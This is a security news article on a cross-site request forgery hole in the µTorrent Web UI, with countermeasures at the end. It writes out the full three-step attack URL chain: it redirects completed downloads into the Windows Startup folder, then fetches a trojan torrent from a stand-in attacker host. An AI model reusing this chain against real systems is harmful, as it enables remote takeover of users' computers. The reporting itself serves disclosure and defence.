Computer takeover via cross site request forgery
Security expert Billy Rios has reported a vulnerability that Rob Carter discovered in the Web UI of the popular µTorrent BitTorrent client. Attackers can use the vulnerability to take complete control over a system using a manipulated email or website. The the vulnerability stems from a cross-site request forgery (CSRF) in which web sites containing crafted links, either in JavaScript or in <IMG> tags, access other websites. The malicious site can then make configuration changes using the access rights of the victim.
In the past, CSRF attacks have been used to change a user's router configuration to make it use a manipulated DNS server. However, the hole that Carter found allows a trojan to be installed directly onto the victim's computer.
Carter's attack is performed in several stages. The first link changes the configuration of µTorrent, causing it to move completed downloads to an alternative directory:
http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=1
Then it changes the path to which completed downloads are moved:
http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:\Doc uments%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup
That moves downloaded files into the autostart folder for every user on the system. Now the attacker can use a third link to initiate download of a Trojan, which is executed once the computer is restarted and a user logs in:
http://localhost:14774/gui/?action=add-rl&s= http://boeser.server.domain/trojaner.torrent
Countermeasures against such a CSRF attack could include requiring a password every time configuration changes are made or using a session ID, which must not however be stored in a cookie.
µTorrent web UI plug-in users should, at the very least, change the standard port that the interface listens on. They should also immediately log out of the interface following any changes to it. The safest course is simply not to use the plug-in at all until the developers offer a patched version of it for download.
See also:
- CSRF pwns your box?!?!, Billy Rios blog entry
- uTorrent pwned, Rob Carter blog entry
(mba)
![Kernel Log: Coming in 3.10 (Part 3) [--] Infrastructure](/imgs/43/1/0/4/2/6/7/2/comingin310_4_kicker-4977194bfb0de0d7.png)
![Kernel Log: Coming in 3.10 (Part 3) [--] Infrastructure](/imgs/43/1/0/4/2/3/2/3/comingin310_3_kicker-151cd7b9e9660f05.png)
